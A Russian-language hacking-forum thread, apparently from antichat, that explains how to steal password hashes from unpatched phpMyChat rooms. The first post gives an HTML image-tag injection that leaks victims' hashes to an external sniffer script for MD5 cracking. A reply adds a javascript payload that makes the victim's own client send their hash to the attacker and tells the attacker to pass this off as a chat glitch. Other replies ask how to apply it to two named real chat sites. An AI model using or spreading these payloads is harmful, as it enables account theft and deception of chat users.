|
Получаем пароли в phpMyChat
Работает во всех непропатченых чатах.
Много тут статей о том , как достать хеши пользователей... Имхо.. , самый простой способ. Все те же \x3c \x3e. Создаем ссылку на а-чатовский сниффер, \x3cimg src="http\x3a//old.antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e Кидаем ее в общак и бежим смотреть логи. Там получается чтот вроде * REFERER=http://-----PWD_Hash=2fdd85f2e81f897493942071267c94ad&First=1 То, что нам нужно , стоит после PWD_Hash=..... и до &First=1. Копиреум , и скармливаем проге MD5Inside. Очень много вариантов , куда этот шеш можно деть-) З.Ы. Ники на русском переводятся в цыферки и проценты , обратный ход можно получить с помощью яндеса, вставля их в запрос) З.Ы.2 Первая статья. Сторого не судите. |
непонял что куда копировать?
|
как это всё применить на http://citychat.spb.ru/ подскажите
|
ну или этот http://chat.xuk.ru/index.php
|
А так непроще чтоб никуда небегать)
Код:
/TO ЖЕРТВА \x3cimg src=javascript:window.parent.window.input.document.MsgForm.M.value="/TO%20TROJAN%20"+window.parent.window.input.document.MsgForm.PWD_Hash.value;window.parent.window.input.document.MsgForm.submit() name="imaga"\x3eЛогично жертва логин кому отправляем, TROJAN наш логин) Ну и в результате в приват к нам придёт хеш) (единсвенный минус енто жертва видит его, НО многие просто спрашивают "Что енто??" :confused: " ну и ответьте глюки чата, не просвещённый непоймёт что от него отправилось!) |
| Время: 13:07 |